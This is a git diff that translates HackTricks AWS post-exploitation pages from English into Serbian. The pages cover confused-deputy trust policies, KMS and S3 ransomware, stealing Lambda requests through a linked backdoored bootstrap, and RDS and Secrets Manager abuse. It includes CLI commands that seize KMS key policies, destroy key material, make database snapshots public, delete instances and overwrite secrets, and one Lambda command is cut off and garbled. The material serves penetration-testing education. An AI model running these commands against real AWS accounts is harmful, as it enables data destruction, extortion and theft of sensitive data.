-      "AWS": "Example Corp's AWS Account ID"
-    },
-    "Action": "sts:AssumeRole",
-    "Condition": {
-      "StringEquals": {
-        "sts:ExternalId": "12345"
-      }
-    }
-  }
+"Version": "2012-10-17",
+"Statement": {
+"Effect": "Allow",
+"Principal": {
+"AWS": "Example Corp's AWS Account ID"
+},
+"Action": "sts:AssumeRole",
+"Condition": {
+"StringEquals": {
+"sts:ExternalId": "12345"
+}
+}
+}
 }
 ```
-
 > [!WARNING]
-> For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts.
+> Da bi napadač iskoristio zbunjenog zamenika, moraće nekako da sazna da li subjekti trenutnog naloga mogu da imituju uloge u drugim nalozima.
 
-### Unexpected Trusts
-
-#### Wildcard as principal
+### Neočekivana poverenja
 
+#### Wildcard kao subjekt
 ```json
 {
-  "Action": "sts:AssumeRole",
-  "Effect": "Allow",
-  "Principal": { "AWS": "*" }
+"Action": "sts:AssumeRole",
+"Effect": "Allow",
+"Principal": { "AWS": "*" }
 }
 ```
+Ova politika **omogućava svim AWS** da preuzmu ulogu.
 
-This policy **allows all AWS** to assume the role.
-
-#### Service as principal
-
+#### Usluga kao glavni
 ```json
 {
-  "Action": "lambda:InvokeFunction",
-  "Effect": "Allow",
-  "Principal": { "Service": "apigateway.amazonaws.com" },
-  "Resource": "arn:aws:lambda:000000000000:function:foo"
+"Action": "lambda:InvokeFunction",
+"Effect": "Allow",
+"Principal": { "Service": "apigateway.amazonaws.com" },
+"Resource": "arn:aws:lambda:000000000000:function:foo"
 }
 ```
+Ova politika **dozvoljava bilo kojem nalogu** da konfiguriše svoj apigateway da poziva ovu Lambda.
 
-This policy **allows any account** to configure their apigateway to call this Lambda.
-
-#### S3 as principal
-
+#### S3 kao glavni
 ```json
 "Condition": {
 "ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" },
-    "StringEquals": {
-        "aws:SourceAccount": "123456789012"
-    }
+"StringEquals": {
+"aws:SourceAccount": "123456789012"
+}
 }
 ```
+Ako je S3 kofa data kao principal, pošto S3 kofe nemaju ID naloga, ako ste **obrisali svoju kofu i napadač je kreirao** je u svom nalogu, onda bi mogli da to zloupotrebe.
 
-If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this.
-
-#### Not supported
-
+#### Nije podržano
 ```json
 {
-  "Effect": "Allow",
-  "Principal": { "Service": "cloudtrail.amazonaws.com" },
-  "Action": "s3:PutObject",
-  "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*"
+"Effect": "Allow",
+"Principal": { "Service": "cloudtrail.amazonaws.com" },
+"Action": "s3:PutObject",
+"Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*"
 }
 ```
-
-A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources).
+Uobičajen način da se izbegnu problemi sa Confused Deputy je korišćenje uslova sa `AWS:SourceArn` za proveru izvora ARN. Međutim, **neke usluge možda to ne podržavaju** (kao što je CloudTrail prema nekim izvorima).
 
 ## References
 
 - [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md
index 482af5425..5b1811da9 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md
@@ -4,134 +4,122 @@
 
 ## KMS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-kms-enum.md
 {{#endref}}
 
-### Encrypt/Decrypt information
+### Enkriptovanje/Dekriptovanje informacija
 
-`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files:
+`fileb://` i `file://` su URI sheme koje se koriste u AWS CLI komandama za specificiranje puta do lokalnih fajlova:
 
-- `fileb://:` Reads the file in binary mode, commonly used for non-text files.
-- `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements.
+- `fileb://:` Čita fajl u binarnom režimu, obično se koristi za ne-tekstualne fajlove.
+- `file://:` Čita fajl u tekstualnom režimu, obično se koristi za obične tekstualne fajlove, skripte ili JSON koji nemaju posebne zahteve za kodiranje.
 
 > [!TIP]
-> Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://)
-
-- Using a **symmetric** key
+> Imajte na umu da ako želite da dekriptujete neke podatke unutar fajla, fajl mora sadržati binarne podatke, a ne base64 kodirane podatke. (fileb://)
 
+- Koristeći **simetrični** ključ
 ```bash
 # Encrypt data
 aws kms encrypt \
-    --key-id f0d3d719-b054-49ec-b515-4095b4777049 \
-    --plaintext fileb:///tmp/hello.txt \
-    --output text \
-    --query CiphertextBlob | base64 \
-    --decode > ExampleEncryptedFile
+--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
+--plaintext fileb:///tmp/hello.txt \
+--output text \
+--query CiphertextBlob | base64 \
+--decode > ExampleEncryptedFile
 
 # Decrypt data
 aws kms decrypt \
-    --ciphertext-blob fileb://ExampleEncryptedFile \
-    --key-id f0d3d719-b054-49ec-b515-4095b4777049 \
-    --output text \
-    --query Plaintext | base64 \
-    --decode
+--ciphertext-blob fileb://ExampleEncryptedFile \
+--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
+--output text \
+--query Plaintext | base64 \
+--decode
 ```
-
-- Using a **asymmetric** key:
-
+- Koristeći **asimetrični** ključ:
 ```bash
 # Encrypt data
 aws kms encrypt \
-    --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
-    --encryption-algorithm RSAES_OAEP_SHA_256 \
-    --plaintext fileb:///tmp/hello.txt \
-    --output text \
-    --query CiphertextBlob | base64 \
-    --decode > ExampleEncryptedFile
+--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
+--encryption-algorithm RSAES_OAEP_SHA_256 \
+--plaintext fileb:///tmp/hello.txt \
+--output text \
+--query CiphertextBlob | base64 \
+--decode > ExampleEncryptedFile
 
 # Decrypt data
 aws kms decrypt \
-    --ciphertext-blob fileb://ExampleEncryptedFile \
-    --encryption-algorithm RSAES_OAEP_SHA_256 \
-    --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
-    --output text \
-    --query Plaintext | base64 \
-    --decode
+--ciphertext-blob fileb://ExampleEncryptedFile \
+--encryption-algorithm RSAES_OAEP_SHA_256 \
+--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
+--output text \
+--query Plaintext | base64 \
+--decode
 ```
-
 ### KMS Ransomware
 
-An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account.
+Napadač sa privilegovanim pristupom KMS-u može da izmeni KMS politiku ključeva i **dodeli svom nalogu pristup tim ključevima**, uklanjajući pristup koji je dodeljen legitimnom nalogu.
 
-Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account.
+Tada korisnici legitimnog naloga neće moći da pristupe bilo kojim informacijama bilo koje usluge koja je enkriptovana tim ključevima, stvarajući lak ali efikasan ransomware nad nalogom.
 
 > [!WARNING]
-> Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**.
-
-> Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI).
+> Imajte na umu da **AWS upravljani ključevi nisu pogođeni** ovim napadom, samo **Klijentski upravljani ključevi**.
 
+> Takođe imajte na umu potrebu da koristite parametar **`--bypass-policy-lockout-safety-check`** (nedostatak ove opcije u web konzoli čini ovaj napad mogućim samo iz CLI-a).
 ```bash
 # Force policy change
 aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
-    --policy-name default \
-    --policy file:///tmp/policy.yaml \
-    --bypass-policy-lockout-safety-check
+--policy-name default \
+--policy file:///tmp/policy.yaml \
+--bypass-policy-lockout-safety-check
 
 {
-    "Id": "key-consolepolicy-3",
-    "Version": "2012-10-17",
-    "Statement": [
-        {
-            "Sid": "Enable IAM User Permissions",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam:::root"
-            },
-            "Action": "kms:*",
-            "Resource": "*"
-        }
-    ]
+"Id": "key-consolepolicy-3",
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "Enable IAM User Permissions",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam:::root"
+},
+"Action": "kms:*",
+"Resource": "*"
+}
+]
 }
 ```
-
 > [!CAUTION]
-> Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**.
+> Imajte na umu da ako promenite tu politiku i date pristup samo eksternom nalogu, a zatim iz ovog eksternog naloga pokušate da postavite novu politiku da **ponovo date pristup originalnom nalogu, nećete moći**.
 
 

 
-### Generic KMS Ransomware
+### Generički KMS Ransomware
 
-#### Global KMS Ransomware
+#### Globalni KMS Ransomware
 
-There is another way to perform a global KMS Ransomware, which would involve the following steps:
+Postoji još jedan način da se izvrši globalni KMS Ransomware, koji bi uključivao sledeće korake:
 
-- Create a new **key with a key material** imported by the attacker
-- **Re-encrypt older data** encrypted with the previous version with the new one.
-- **Delete the KMS key**
-- Now only the attacker, who has the original key material could be able to decrypt the encrypted data
-
-### Destroy keys
+- Kreirajte novi **ključ sa ključnim materijalom** koji je uvezen od strane napadača
+- **Ponovo enkriptujte starije podatke** enkriptovane prethodnom verzijom sa novom.
+- **Obrišite KMS ključ**
+- Sada samo napadač, koji ima originalni ključni materijal, može da dekriptuje enkriptovane podatke
 
+### Uništavanje ključeva
 ```bash
 # Destoy they key material previously imported making the key useless
 aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab
 
 # Schedule the destoy of a key (min wait time is 7 days)
 aws kms schedule-key-deletion \
-    --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
-    --pending-window-in-days 7
+--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
+--pending-window-in-days 7
 ```
-
 > [!CAUTION]
-> Note that AWS now **prevents the previous actions from being performed from a cross account:**
+> Imajte na umu da AWS sada **sprečava prethodne radnje da se izvrše iz druge naloge:**
 
 

 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
index 5f25c205a..ac7ad036d 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
@@ -4,30 +4,26 @@
 
 ## Lambda
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../../aws-services/aws-lambda-enum.md
 {{#endref}}
 
-### Steal Others Lambda URL Requests
+### Ukrasti HTTP Zahteve drugih Lambda
 
-If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them.
+Ako napadač nekako uspe da dobije RCE unutar Lambda, moći će da ukrade HTTP zahteve drugih korisnika ka lambdi. Ako zahtevi sadrže osetljive informacije (kolačiće, akreditive...) moći će da ih ukrade.
 
 {{#ref}}
 aws-warm-lambda-persistence.md
 {{#endref}}
 
-### Steal Others Lambda URL Requests & Extensions Requests
+### Ukrasti HTTP Zahteve drugih Lambda & Zahteve Ekstenzija
 
-Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
+Zloupotrebom Lambda Layers takođe je moguće zloupotrebiti ekstenzije i persistirati u lambdi, ali i ukrasti i modifikovati zahteve.
 
 {{#ref}}
 ../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
 {{#endref}}
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
index bc93fe53a..404d2ddbb 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
@@ -1,42 +1,41 @@
-# AWS - Steal Lambda Requests
+# AWS - Ukradi Lambda Zahteve
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Lambda Flow
+## Lambda Tok
 
 
https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png

 
-1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process.
-2. The init process listens on port **9001** exposing some interesting endpoints:
-   - **`/2018-06-01/runtime/invocation/next`** – get the next invocation event
-   - **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke
-   - **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error
-3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**).
-4. Finally, **bootstrap.py** sends to init the **response**
+1. **Slicer** je proces van kontejnera koji **šalje** **invokacije** procesu **init**.
+2. Proces init sluša na portu **9001** izlažući neke zanimljive krajnje tačke:
+- **`/2018-06-01/runtime/invocation/next`** – dobijanje sledećeg događaja invokacije
+- **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – vraća odgovor handler-a za invokaciju
+- **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – vraća grešku u izvršenju
+3. **bootstrap.py** ima petlju koja dobija invokacije iz init procesa i poziva korisnički kod da ih obradi (**`/next`**).
+4. Na kraju, **bootstrap.py** šalje init-u **odgovor**
 
-Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process.
+Napomena da bootstrap učitava korisnički kod kao modul, tako da se svaka izvršena kodna operacija od strane korisničkog koda zapravo dešava u ovom procesu.
 
-## Stealing Lambda Requests
+## Ukradanje Lambda Zahteva
 
-The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process.
+Cilj ovog napada je da se korisnički kod izvrši kao zlonamerni **`bootstrap.py`** proces unutar **`bootstrap.py`** procesa koji obrađuje ranjivu zahtev. Na ovaj način, **zlonamerni bootstrap** proces će početi da **komunicira sa init procesom** kako bi obradio zahteve dok je **legit** bootstrap **zarobljen** u izvršavanju zlonamernog, tako da neće tražiti zahteve od init procesa.
 
-This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could:
+Ovo je jednostavan zadatak za postizanje jer se kod korisnika izvršava od strane legit **`bootstrap.py`** procesa. Tako da napadač može:
 
-- **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations.
-  - A request must be sent to **`/${invoke-id}/response`**
-  - The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)).
-- Execute a malicious **`boostrap.py`** which will handle the next invocations
-  - For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual.
-  - For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation.
+- **Poslati lažni rezultat trenutne invokacije init procesu**, tako da init misli da bootstrap proces čeka na više invokacija.
+- Zahtev mora biti poslat na **`/${invoke-id}/response`**
+- Invoke-id se može dobiti iz steka legit **`bootstrap.py`** procesa koristeći [**inspect**](https://docs.python.org/3/library/inspect.html) python modul (kao [predloženo ovde](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) ili jednostavno ponovo zahtevati na **`/2018-06-01/runtime/invocation/next`** (kao [predloženo ovde](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)).
+- Izvršiti zlonamerni **`boostrap.py`** koji će obraditi sledeće invokacije
+- Za svrhe prikrivanja moguće je poslati parametre lambda invokacija na C2 kontrolisan od strane napadača i zatim obraditi zahteve kao i obično.
+- Za ovaj napad, dovoljno je dobiti originalni kod **`bootstrap.py`** sa sistema ili [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), dodati zlonamerni kod i pokrenuti ga iz trenutne lambda invokacije.
 
-### Attack Steps
+### Koraci Napada
 
-1. Find a **RCE** vulnerability.
-2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py))
-3. **Execute** the malicious bootstrap.
-
-You can easily perform these actions running:
+1. Pronaći **RCE** ranjivost.
+2. Generisati **zlonamerni** **bootstrap** (npr. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py))
+3. **Izvršiti** zlonamerni bootstrap.
 
+Možete lako izvršiti ove akcije pokretanjem:
 ```bash
 python3 < \
-    --db-subnet-group-name  \
-    --publicly-accessible \
-    --vpc-security-group-ids 
+--db-instance-identifier "new-db-not-malicious" \
+--db-snapshot-identifier  \
+--db-subnet-group-name  \
+--publicly-accessible \
+--vpc-security-group-ids 
 
 aws rds modify-db-instance \
-    --db-instance-identifier "new-db-not-malicious" \
-    --master-user-password 'Llaody2f6.123' \
-    --apply-immediately
+--db-instance-identifier "new-db-not-malicious" \
+--master-user-password 'Llaody2f6.123' \
+--apply-immediately
 
 # Connect to the new DB after a few mins
 ```
-
 ### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot`
 
-An attacker with these permissions could **create an snapshot of a DB** and make it **publicly** **available**. Then, he could just create in his own account a DB from that snapshot.
-
-If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**.
+Napadač sa ovim dozvolama mogao bi **napraviti snimak DB** i učiniti ga **javnim** **dostupnim**. Zatim bi mogao jednostavno da napravi u svom nalogu DB iz tog snimka.
 
+Ako napadač **nema `rds:CreateDBSnapshot`**, i dalje bi mogao učiniti **druge** kreirane snimke **javnim**.
 ```bash
 # create snapshot
 aws rds create-db-snapshot --db-instance-identifier  --db-snapshot-identifier 
@@ -54,43 +51,32 @@ aws rds create-db-snapshot --db-instance-identifier  --d
 aws rds modify-db-snapshot-attribute --db-snapshot-identifier  --attribute-name restore --values-to-add all
 ## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
 ```
-
 ### `rds:DownloadDBLogFilePortion`
 
-An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.
-
+Napadač sa `rds:DownloadDBLogFilePortion` dozvolom može **preuzeti delove log fajlova RDS instance**. Ako su osetljivi podaci ili akreditivi za pristup slučajno zabeleženi, napadač bi mogao potencijalno iskoristiti ove informacije za eskalaciju svojih privilegija ili izvršavanje neovlašćenih radnji.
 ```bash
 aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
 ```
-
-**Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials.
+**Potencijalni uticaj**: Pristup osetljivim informacijama ili neovlašćene radnje korišćenjem provaljenih akreditiva.
 
 ### `rds:DeleteDBInstance`
 
-An attacker with these permissions can **DoS existing RDS instances**.
-
+Napadač sa ovim dozvolama može **napasti postojeće RDS instance**.
 ```bash
 # Delete
 aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
 ```
-
-**Potential impact**: Deletion of existing RDS instances, and potential loss of data.
+**Potencijalni uticaj**: Brisanje postojećih RDS instanci i potencijalni gubitak podataka.
 
 ### `rds:StartExportTask`
 
-> [!NOTE]
-> TODO: Test
-
-An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.
+> [!NAPOMENA]
+> TODO: Testirati
 
+Napadač sa ovom dozvolom može **izvesti snimak RDS instance u S3 kantu**. Ako napadač ima kontrolu nad odredišnom S3 kantom, može potencijalno pristupiti osetljivim podacima unutar izvezenog snimka.
 ```bash
 aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
 ```
-
-**Potential impact**: Access to sensitive data in the exported snapshot.
+**Potencijalni uticaj**: Pristup osetljivim podacima u eksportovanom snimku. 
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
index 16cc52f27..56a8fe15b 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md
@@ -4,39 +4,35 @@
 
 ## S3
 
-For more information check:
+Za više informacija proverite:
 
 {{#ref}}
 ../aws-services/aws-s3-athena-and-glacier-enum.md
 {{#endref}}
 
-### Sensitive Information
+### Osetljive Informacije
 
-Sometimes you will be able to find sensitive information in readable in the buckets. For example, terraform state secrets.
+Ponekad ćete moći da pronađete osetljive informacije u čitljivim u kanticama. Na primer, terraform state tajne.
 
-### Pivoting
+### Pivotiranje
 
-Different platforms could be using S3 to store sensitive assets.\
-For example, **airflow** could be storing **DAGs** **code** in there, or **web pages** could be directly served from S3. An attacker with write permissions could **modify the code** from the bucket to **pivot** to other platforms, or **takeover accounts** modifying JS files.
+Različite platforme mogu koristiti S3 za skladištenje osetljivih sredstava.\
+Na primer, **airflow** može skladištiti **DAGs** **kod** tamo, ili se **web stranice** mogu direktno servirati iz S3. Napadač sa dozvolama za pisanje može **modifikovati kod** iz kante da **pivotira** na druge platforme, ili **preuzeti naloge** modifikovanjem JS datoteka.
 
 ### S3 Ransomware
 
-In this scenario, the **attacker creates a KMS (Key Management Service) key in their own AWS account** or another compromised account. They then make this **key accessible to anyone in the world**, allowing any AWS user, role, or account to encrypt objects using this key. However, the objects cannot be decrypted.
+U ovom scenariju, **napadač kreira KMS (Key Management Service) ključ u svom AWS nalogu** ili drugom kompromitovanom nalogu. Zatim čini ovaj **ključ dostupnim svima na svetu**, omogućavajući bilo kojem AWS korisniku, ulozi ili nalogu da enkriptuje objekte koristeći ovaj ključ. Međutim, objekti se ne mogu dekriptovati.
 
-The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more.
+Napadač identifikuje ciljnu **S3 kanticu i dobija pristup na nivou pisanja** koristeći različite metode. To može biti zbog loše konfiguracije kante koja je javno izložena ili napadač dobija pristup AWS okruženju. Napadač obično cilja kante koje sadrže osetljive informacije kao što su lične identifikacione informacije (PII), zaštićene zdravstvene informacije (PHI), logove, rezervne kopije i još mnogo toga.
 
-To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket.
+Da bi utvrdio da li se kanta može ciljati za ransomware, napadač proverava njenu konfiguraciju. Ovo uključuje verifikaciju da li je **S3 Object Versioning** omogućen i da li je **multi-factor authentication delete (MFA delete) omogućen**. Ako Object Versioning nije omogućen, napadač može nastaviti. Ako je Object Versioning omogućen, ali je MFA delete onemogućen, napadač može **onemogućiti Object Versioning**. Ako su i Object Versioning i MFA delete omogućeni, postaje teže za napadača da ransomware-uje tu specifičnu kantu.
 
-Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key.
+Koristeći AWS API, napadač **menja svaki objekat u kanti sa enkriptovanom kopijom koristeći svoj KMS ključ**. Ovo efikasno enkriptuje podatke u kanti, čineći ih nedostupnim bez ključa.
 
-To add further pressure, the attacker schedules the deletion of the KMS key used in the attack. This gives the target a 7-day window to recover their data before the key is deleted and the data becomes permanently lost.
+Da bi dodatno pritisnuo, napadač zakazuje brisanje KMS ključa korišćenog u napadu. Ovo daje cilju 7-dnevni period da povrati svoje podatke pre nego što ključ bude obrisan i podaci postanu trajno izgubljeni.
 
-Finally, the attacker could upload a final file, usually named "ransom-note.txt," which contains instructions for the target on how to retrieve their files. This file is uploaded without encryption, likely to catch the target's attention and make them aware of the ransomware attack.
+Na kraju, napadač može otpremiti konačnu datoteku, obično nazvanu "ransom-note.txt," koja sadrži uputstva za cilj o tome kako da povrati svoje datoteke. Ova datoteka se otprema bez enkripcije, verovatno da bi privukla pažnju cilja i obavestila ih o ransomware napadu.
 
-**For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.**
+**Za više informacija** [**proverite originalno istraživanje**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.**
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
index e59cbbaaa..b2385d889 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md
@@ -1,53 +1,43 @@
-# AWS - Secrets Manager Post Exploitation
+# AWS - Post Eksploatacija Secrets Manager-a
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Secrets Manager
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-secrets-manager-enum.md
 {{#endref}}
 
-### Read Secrets
+### Čitanje Tajni
 
-The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them.
+**Tajne same su osetljive informacije**, [proverite stranicu za privesc](../aws-privilege-escalation/aws-secrets-manager-privesc.md) da biste saznali kako ih pročitati.
 
-### DoS Change Secret Value
+### DoS Promena Vrednosti Tajne
 
-Changing the value of the secret you could **DoS all the system that depends on that value.**
+Promenom vrednosti tajne mogli biste **DoS-ovati ceo sistem koji zavisi od te vrednosti.**
 
 > [!WARNING]
-> Note that previous values are also stored, so it's easy to just go back to the previous value.
-
+> Imajte na umu da su prethodne vrednosti takođe sačuvane, tako da je lako jednostavno se vratiti na prethodnu vrednost.
 ```bash
 # Requires permission secretsmanager:PutSecretValue
 aws secretsmanager put-secret-value \
-    --secret-id MyTestSecret \
-    --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"
+--secret-id MyTestSecret \
+--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"
 ```
-
-### DoS Change KMS key
-
+### DoS Promena KMS ključa
 ```bash
 aws secretsmanager update-secret \
-    --secret-id MyTestSecret \
-    --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
+--secret-id MyTestSecret \
+--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
 ```
+### DoS Brisanje Tajne
 
-### DoS Deleting Secret
-
-The minimum number of days to delete a secret are 7
-
+Minimalan broj dana za brisanje tajne je 7
 ```bash
 aws secretsmanager delete-secret \
-    --secret-id MyTestSecret \
-    --recovery-window-in-days 7
+--secret-id MyTestSecret \
+--recovery-window-in-days 7
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
index e67a07739..f76e76ec4 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## SES
 
-For more information check:
